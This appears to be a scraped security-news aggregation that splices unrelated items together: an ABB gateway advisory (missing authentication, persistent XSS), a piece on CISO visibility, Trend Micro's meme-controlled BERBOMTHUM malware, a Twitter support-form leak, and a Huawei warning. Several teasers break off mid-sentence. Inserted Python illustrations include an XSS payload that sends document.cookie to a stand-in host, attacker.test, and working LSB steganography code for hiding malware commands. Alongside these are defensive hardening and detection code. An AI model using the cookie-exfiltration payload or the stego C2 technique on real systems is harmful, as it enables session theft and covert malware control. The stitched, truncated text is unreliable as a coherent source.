“Do what we say, or we shall replace you with a very small shell script.” It’s a bit of a dated threat now, but in the age of extreme optimization there are certain functions where it absolutely is a possibility. But who’s going to be the person writing that script? You! Web development is an […]

Security experts at Applied Risk have found that ABB Pluto Gateway products are affected by potentially serious flaws, and the bad news is that the vendor will not release firmware updates because the impacted products have reached end of life.

The security firm published an advisory that provides technical details for two vulnerabilities in the ABB Pluto Gateway products GATE-E1 and GATE-E2.

The ABB gateway solutions allow ABB PLCs to communicate with other control systems.

“Two vulnerabilities were found in the ABB GATE E1/E2 devices. These findings include a total lack of authentication for the administrative interfaces on the device, as well as an unauthenticated persistent Cross-Site Scripting vulnerability.” reads the advisory published by Applied Risk.

“As a result of these findings, ABB has put the GATE-E2 in End-of-Life. The E1 device was already in EoL.”

The devices do not implement authentication on their administrative telnet and web interfaces. The flaws could be exploited to change device settings and to cause a DoS condition by continuously resetting the product.

Applied Risk assigned the missing-authentication flaw a CVSS v3 base score of 9.8.

Experts also discovered a persistent cross-site scripting (XSS) flaw that could be exploited by an attacker to inject malicious code via the administrative HTTP and telnet interfaces. The injected code is executed when a legitimate admin accesses the device’s web portal. The flaw was rated “high” severity.
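To make the two bug classes concrete, here is an added illustration (not the GATE-E1/E2 firmware, nor code from Applied Risk or ABB) of a toy gateway admin interface: a version that accepts settings changes and resets from anyone and renders a stored setting unescaped, next to a hardened version that requires a session and HTML-escapes the stored value before rendering. The session store, the admin credential and the settings names are assumptions made up for the example.

```python
"""Missing authentication and persistent XSS on an admin interface: vulnerable
vs hardened. Constructed illustration; not the ABB device's real code."""
import html
import secrets

SESSIONS = {}                                  # token -> role (assumed session store)
ADMIN_PASSWORD = "correct horse battery staple"  # assumed credential, for the demo only


def login(password):
    """Issue a random session token only when the credential is correct."""
    if password != ADMIN_PASSWORD:
        return None
    token = secrets.token_hex(16)
    SESSIONS[token] = "admin"
    return token


class VulnerableGateway:
    """No authentication on writes or reset; stored value rendered verbatim."""

    def __init__(self):
        self.settings = {"device_name": "gateway-1"}
        self.reset_count = 0

    def set_setting(self, key, value, session=None):
        self.settings[key] = value          # anyone on the network can change settings
        return True

    def reset(self, session=None):
        self.reset_count += 1               # anyone can reboot it in a loop (DoS)
        return True

    def status_page(self):
        # Persistent XSS: whatever was stored is emitted straight into HTML.
        return "<h1>Device: %s</h1>" % self.settings["device_name"]


class HardenedGateway(VulnerableGateway):
    """Writes and resets need an admin session; output is escaped."""

    def _is_admin(self, session):
        return SESSIONS.get(session) == "admin"

    def set_setting(self, key, value, session=None):
        if not self._is_admin(session):
            return False
        if key not in {"device_name", "ip_addr"}:   # allow-list of settable keys
            return False
        self.settings[key] = value
        return True

    def reset(self, session=None):
        if not self._is_admin(session):
            return False
        self.reset_count += 1
        return True

    def status_page(self):
        return "<h1>Device: %s</h1>" % html.escape(self.settings["device_name"], quote=True)


def demo():
    """Run the same attacker inputs against both versions and return the results."""
    payload = '<script>new Image().src="http://attacker.test/?c="+document.cookie</script>'
    vuln = VulnerableGateway()
    vuln.set_setting("device_name", payload)      # succeeds with no session
    for _ in range(3):
        vuln.reset()                              # succeeds with no session

    hard = HardenedGateway()
    unauth_write = hard.set_setting("device_name", payload)   # rejected
    unauth_reset = hard.reset()                               # rejected
    token = login(ADMIN_PASSWORD)
    hard.set_setting("device_name", payload, session=token)   # admin may store it...
    return {
        "vuln_page": vuln.status_page(),          # ...but only the vulnerable page executes it
        "vuln_resets": vuln.reset_count,
        "hard_page": hard.status_page(),
        "unauth_write": unauth_write,
        "unauth_reset": unauth_reset,
        "hard_resets": hard.reset_count,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "=", v)
```

Note that the hardened version still lets an authenticated admin store the script tag; what stops the XSS is escaping at render time, not rejecting input. For an end-of-life device that cannot be patched, the equivalent of the session check has to come from the network: keep the telnet and HTTP ports reachable only from an engineering VLAN or jump host.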

ABB also published separate advisories for the missing-authentication and XSS vulnerabilities, and will send customers instructions on how to secure their installations.

The good news is that the experts are not aware of attacks exploiting the flaws in the wild.

Virtually all companies like to say they take their customers’ privacy and security seriously, make it a top priority, blah blah. But you’d be forgiven if you couldn’t tell this by studying the executive leadership page of each company’s Web site. That’s because very few of the world’s biggest companies list any security executives in their highest ranks. Even among top tech firms, less than half list a chief technology officer (CTO). This post explores some reasons why this is the case, and why it can’t change fast enough.

KrebsOnSecurity reviewed the Web sites for the global top 100 companies by market value, and found just five percent of top 100 firms listed a chief information security officer (CISO) or chief security officer (CSO). Only a little more than a third even listed a CTO in their executive leadership pages.

The reality among high-tech firms that make up the top 50 companies in the NASDAQ market was even more striking: Fewer than half listed a CTO in their executive ranks, and I could find only three that featured a person with a security title.

Nobody’s saying these companies don’t have CISOs and/or CSOs and CTOs in their employ. A review of these companies via LinkedIn suggests that most of them in fact do have people in those roles (although I suspect the few that aren’t present or easily findable on LinkedIn have made a personal and/or professional decision not to be listed as such).

But it is interesting to note which roles companies consider worthwhile publishing in their executive leadership pages. For example, 73 percent of the top 100 companies listed a chief of human resources (or “chief people officer”), and about one-third included a chief marketing officer.

Not that these roles are somehow more or less important than that of a CISO/CSO within the organization. Nor is the average pay hugely different among all three roles. Yet, considering how much marketing (think consumer/customer data) and human resources (think employee personal/financial data) are impacted by your average data breach, it’s somewhat remarkable that more companies don’t list their chief security personnel among their top ranks.

Julie Conroy, research director at the market analyst firm Aite Group, said she initially hypothesized that companies with a regulatory mandate for strong cybersecurity controls (e.g. banks) would have this role in their executive leadership team.

“But a quick look at Bank of America and Chase’s websites proved me wrong,” Conroy said. “It looks like the CISO in those firms is one layer down, reporting to the executive leadership.”

Conroy says this dynamic reflects the fact that revenue centers like human capital and the ability to drum up new business are still prioritized and valued by businesses more than cost centers — including loss prevention and cybersecurity.

“Marketing and digital strategy roles drive top line revenue for firms—the latter is particularly important in retail and banking businesses as so much commerce moves online,” Conroy said. “While you and I know that cybersecurity and loss prevention are critical functions for all types of businesses, I don’t think that reality is reflected in the organizational structure of many businesses still. A common theme in my discussions with executives in cost center roles is how difficult it is for them to get budget to fund the tech they need for loss prevention initiatives.”

EXHIBIT A: EQUIFAX

Common or not, the dominant reporting structure in corporations runs the risk of having security concerns take a backseat when they get in the way of productivity, and often leaves the security team without someone to advocate for the proper budget.

Take the mega breach at Equifax last year that exposed the personal and financial data of 148 million people. Much blame has been placed on lax software patching practices at Equifax, but the cause of the intrusion was ultimately a people and organizational structure issue, argues Lance Spitzner, director of security awareness at the SANS Institute.

“When you bring up the Equifax breach, most people respond that it was a patching issue, the bad guys exploited a Struts vulnerability that Equifax knew about and should have patched,” Spitzner wrote in a breakdown of a damning report released last week by lawmakers on the House Oversight committee.

But why wasn’t it patched? And why did it take them two months to identify the breach? Spitzner says the House report shows the ultimate reason was because the CSO Susan Mauldin did not report to the CIO, but was buried underneath the Chief Legal Officer. IT was siloed from security; the two rarely communicated or coordinated, leaving gaping holes in the organization.

The reason for this organizational divide? Spitzner notes:

“Ten years prior, the CSO reported to the CIO, however they had strong personality conflicts. Since the two could not work together, the CSO was moved under legal. However, when Equifax’s new CIO David Webb and new CSO Susan Mauldin came on board, this split was never resolved. (Full details of this strategic failure start on page 55 of the report. I feel this is one of the most critical findings.) As a result, the CSO is now the CISO and that individual reports directly to the CEO at Equifax today.”

EXECUTIVE SILOS

Workforce experts say the main reason many firms don’t list their security leaders within their top executives is that these people typically do not report directly to the company’s board of directors or CEO. More commonly, the CSO or CISO reports to the CTO, or to the chief information officer.

“You need to make sure that your heads of security are on equal footing with the heads of tech, otherwise there is an inherent conflict at play,” said Anthony Belfiore, chief security officer for insurance company Aon PLC, in a Wall Street Journal story this month about the rising prominence of security leaders at major companies.

Source: Accenture.

Alissa Valentina Knight, senior analyst and colleague of Conroy’s at the Aite Group, said we’re in the middle of a changing of tides — where the CISO function once seen as a technology problem is now moving to a boardroom problem and bringing about a gradual shift in reporting structure.

“Historically, you’d see the CISO reporting to the CTO and despite the company having a CISO, that individual wasn’t listed on the company’s web site, [and] while they had an officer title, they weren’t given that privilege,” Knight said.

But she added that many companies — despite having a CISO — will not list them on their web site’s leadership team page, even when that reporting structure changes from the CTO to the CEO or Board of Directors.

“Some companies are even moving the cybersecurity function to report up through the CFO,” Knight said.

According to a survey released this summer by Accenture, two-thirds of companies said their chief executive and board of directors now have direct oversight of cybersecurity. The survey also found that CIOs had less control over cybersecurity budgets, down from 35 percent in 2017 to 29 percent in 2018.

Companies can minimize conflict between the CSO/CISO and other top executives by having their security leader(s) report to the head of operations, or to the company’s general counsel, Belfiore told The Journal. For example, those that have CISOs reporting to CIOs can mix in reporting lines to legal, risk or the CEO office to offset potential conflicts.

*Calculated based on number of top 100 companies with available leadership data (see these Top 100 and Top 50 spreadsheets).

It seems as though not a day goes by without news spreading over another major cyber attack.
Hackers are becoming increasingly efficient at targeting everything from small startups to Fortune 500 companies and even entire government agencies, and as the world moves further away from traditional types of warfare and more toward engaging in all-out cyber warfare, these attacks are only going to

Security researchers at Trend Micro have spotted a new strain of malware that retrieves commands from memes posted on a Twitter account controlled by the attackers. In this way the attackers make the malware’s traffic hard to spot, since in this case it appears as legitimate Twitter traffic.

The use of legitimate web services to control malware is not a novelty; in the past, crooks have used legitimate services such as Gmail, Dropbox, Pastebin and also Twitter to control malicious code.

The malware discovered by Trend Micro uses steganography to hide the commands embedded in memes posted on Twitter.

“This new threat (detected as TROJAN.MSIL.BERBOMTHUM.AA) is notable because the malware’s commands are received via a legitimate service (which is also a popular social networking platform), employs the use of benign-looking yet malicious memes, and it cannot be taken down unless the malicious Twitter account is disabled.” reads the post published by Trend Micro.

“Twitter has already taken the account offline as of December 13, 2018.”

The attackers hid the “/print” command in the memes; it instructs the malware to take screenshots of the infected machine and send them back to a C&C server whose address is obtained through a hard-coded URL on pastebin.com.

The BERBOMTHUM malware checks the Twitter account used by the attackers, downloads and scans the meme files, and extracts the commands they contain.

The Twitter account used by miscreants was created in 2017 and contained only two memes posted on October 25 and 26. The images were used to deliver the “/print” commands to the malware.

Below is the list of commands supported by the malware:

Command       Description
/print        Screen capture
/processos    Retrieve list of running processes
/clip         Capture clipboard content
/username     Retrieve username from infected machine
/docs         Retrieve filenames from a predefined path (Desktop, %AppData%, etc.)
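The page says the commands are hidden in the images with steganography but does not describe the encoding BERBOMTHUM uses. The following added example (written for this page, not Trend Micro's or the malware's code) shows the generic least-significant-bit technique on a synthetic pixel buffer: a command is written into the low bit of each byte, the cover and stego buffers differ by at most one per byte, and the receiving side recovers the text and checks it against the command table above. The cover data and the NUL-terminated framing are assumptions of the example.

```python
"""LSB steganography for a C2 command: embed, extract, and dispatch-table check.
Constructed example; the real BERBOMTHUM encoding is not given on this page."""
import random

# The command table from the Trend Micro write-up (see above).
SUPPORTED = {"/print", "/processos", "/clip", "/username", "/docs"}


def embed(pixels: bytes, message: str) -> bytes:
    """Write message bytes plus a NUL terminator into the LSB of each pixel byte."""
    data = message.encode() + b"\x00"
    bits = [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]
    if len(bits) > len(pixels):
        raise ValueError("cover too small for message")
    out = bytearray(pixels)
    for idx, bit in enumerate(bits):
        out[idx] = (out[idx] & 0xFE) | bit   # clear low bit, then set it to the message bit
    return bytes(out)


def extract(pixels: bytes) -> str:
    """Collect LSBs eight at a time until a NUL byte and return the hidden text."""
    data = bytearray()
    cur, n = 0, 0
    for b in pixels:
        cur = (cur << 1) | (b & 1)
        n += 1
        if n == 8:
            if cur == 0:          # terminator
                break
            data.append(cur)
            cur, n = 0, 0
    return data.decode(errors="replace")


def parse_command(hidden: str):
    """Return (command, argument) when the hidden text starts with a supported command,
    otherwise None, so junk recovered from a non-stego image is ignored."""
    if not hidden.startswith("/"):
        return None
    parts = hidden.split(maxsplit=1)
    cmd = parts[0]
    if cmd not in SUPPORTED:
        return None
    return cmd, (parts[1] if len(parts) > 1 else "")


def demo():
    """Hide '/print' in a synthetic 'meme', recover it, and measure the pixel change."""
    rng = random.Random(1)
    cover = bytes(rng.randrange(256) for _ in range(4096))   # constructed cover data
    stego = embed(cover, "/print")
    hidden = extract(stego)
    max_delta = max(abs(a - b) for a, b in zip(cover, stego))  # 1: visually invisible
    return hidden, parse_command(hidden), max_delta


if __name__ == "__main__":
    print(demo())
```

The takeaway for defenders is in the last line of the demo: the carrier image is byte-for-byte almost identical to a benign one, and the download itself is ordinary HTTPS to twitter.com, so network inspection will not flag it. Detection has to come from the host side, for example a process that fetches images from Twitter and then resolves a Pastebin URL before reaching out to an unrelated server.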

According to Trend Micro, the malware is in the early stages of its development; the experts noticed that the Pastebin link points to a local,

Reporting is the final and potentially most important phase of a red team assessment. The goal of a red team assessment is to provide the client with a comprehensive view of their security and the ability to act to correct any identified issues. Any part of the assessment that the client can’t understand and act […]

Twitter has been hit with a minor data breach incident that the social networking site believes is linked to a suspected state-sponsored attack.
In a blog post published on Monday, Twitter revealed that while investigating a vulnerability affecting one of its support forms, the company discovered evidence of the bug being misused to access and steal users’ exposed information.
The impacted

Twitter discovered a possible nation-state attack while it was investigating an information disclosure flaw affecting its platform.

Experts at Twitter discovered a possible state-sponsored attack while they were investigating an information disclosure vulnerability affecting its support forms. They found that the suspicious requests came from IP addresses that may be linked to nation-state actors.

The flaw affected a support form that could be used to contact Twitter in case of problems with an account. The flaw could have been exploited to obtain the country code of a user’s phone number and determine whether or not the account had been locked by Twitter.

An account can be locked if it violates the rules or terms of service, or if it has been compromised. The social media platform fixed the flaw on November 15, within 24 hours of discovering it.

The experts noticed suspicious activity involving the API behind the flawed customer support form.

“During our investigation, we noticed some unusual activity involving the affected customer support form API.” reads a blog post published by Twitter.

“Specifically, we observed a large number of inquiries coming from individual IP addresses located in China and Saudi Arabia. While we cannot confirm intent or attribution for certain, it is possible that some of these IP addresses may have ties to state-sponsored actors. We continue to err on the side of full transparency in this area and have updated law enforcement on our findings.”
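The signal Twitter describes, a large number of inquiries from individual IP addresses against a form that leaks one fact per account, is an enumeration pattern that can be caught in API logs before attribution is even a question. The following added example (written for this page, not Twitter's code or log format) runs a sliding-window detector over constructed request lines: per source IP it counts how many distinct target accounts were queried within any five-minute window and flags sources above a threshold. The log format, IPs, window and threshold are assumptions of the example.

```python
"""Flag sources that query a support form about many different accounts in a
short window. Constructed log format; not Twitter's real telemetry."""
import collections
import datetime as dt

FMT = "%Y-%m-%dT%H:%M:%SZ"


def parse(line):
    """'<ts> <ip> <method> <path> target=<handle>' -> (timestamp, ip, handle)."""
    ts, ip, _method, _path, target = line.split()
    return dt.datetime.strptime(ts, FMT), ip, target.split("=", 1)[1]


def peak_distinct_targets(events, window):
    """Largest number of distinct target accounts one source hit within any window.
    events: list of (timestamp, target) for a single source IP."""
    events.sort()
    counts = collections.Counter()
    best = start = 0
    for ts, target in events:
        counts[target] += 1
        while ts - events[start][0] > window:      # slide the window's left edge
            old = events[start][1]
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            start += 1
        best = max(best, len(counts))
    return best


def find_enumerators(lines, window=dt.timedelta(minutes=5), threshold=100):
    """Return {ip: peak_distinct_targets} for sources at or above the threshold."""
    by_ip = collections.defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        ts, ip, target = parse(line)
        by_ip[ip].append((ts, target))
    return {ip: peak for ip, events in by_ip.items()
            if (peak := peak_distinct_targets(events, window)) >= threshold}


def build_sample():
    """Constructed traffic: three people asking about their own account, plus one
    source walking 300 different handles in three minutes."""
    base = dt.datetime(2018, 11, 14, 10, 0, 0)
    lines = []
    for i, ip in enumerate(["198.51.100.7", "198.51.100.8", "198.51.100.9"]):
        when = (base + dt.timedelta(minutes=i)).strftime(FMT)
        lines.append(f"{when} {ip} POST /support/account-form target=user{i}")
    for i in range(300):
        when = (base + dt.timedelta(seconds=i * 0.6)).strftime(FMT)
        lines.append(f"{when} 203.0.113.5 POST /support/account-form target=handle{i}")
    return lines


if __name__ == "__main__":
    print(find_enumerators(build_sample()))
```

Counting distinct targets rather than raw requests is deliberate: a user retrying the form about their own account produces many requests but one target, while enumeration produces one request per target. A real deployment would also key on the account or session making the request, since an actor can spread the queries over many IPs.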

Twitter, like many other social media platforms, is a prime target for state-sponsored hackers, who can use it for online propaganda and to spread fake news.

In November, the researcher Terence Eden discovered that the permissions dialog when authorizing certain apps to Twitter could expose direct messages to the third-party. The expert was awarded $2,940 for reporting the bug to the company under the bug bounty program operated through the HackerOne platform.

Security researchers have discovered yet another example of how cybercriminals disguise their malware activities as regular traffic by using legitimate cloud-based services.
Trend Micro researchers have uncovered a new piece of malware that retrieves commands from memes posted on a Twitter account controlled by the attackers.
Most malware relies on communication with their

A Czech cyber-security agency is warning against using Huawei and ZTE technologies because they pose a threat to state security.

The Chinese nightmare is rapidly spreading among European countries, now a Czech cyber-security agency is warning against using the equipment manufactured by Chinese firms Huawei and ZTE because they pose a threat to state security.

“The main issue is a legal and political environment of the People’s Republic of China, where (the) aforementioned companies primarily operate,” reads a statement issued by the Czech National Cyber and Information Security Agency.

“China’s laws, among other things, require private companies residing in China to cooperate with intelligence services, therefore introducing them into the key state systems might present a threat,”

According to the Czech News Agency (CTK), the Czech branch of the Chinese Telco giant Huawei refused any accusation and asked the agency to offer proof of the alleged espionage activities for the Chinese intelligence.

“The warning comes on the heels of a Czech intelligence report which warned about increased spying activities of Chinese diplomats in the EU and NATO member state of 10.6 million people.” reported the AFP press.

The US first, and many other countries after, have decided to ban network equipment manufactured by the Chinese telecom giant Huawei.

In November 2018, the Wall Street Journal reported that the US Government was urging its allies, including Germany, to exclude Huawei from critical infrastructure and 5G architectures.

The Chinese firm was already excluded by several countries from building their 5G internet networks. The United States, Australia, New Zealand, and Japan announced the exclusion of Huawei technology for their 5G internet networks.

The United States is highlighting the risks for national security in case of adoption of Huawei equipment and is inviting internet providers and telco operators in allied countries to ban the company.

Now Germany’s IT watchdog has expressed its opinion on a ban of Huawei technology, pointing out that there is no evidence the equipment could be used by Chinese intelligence for cyber espionage.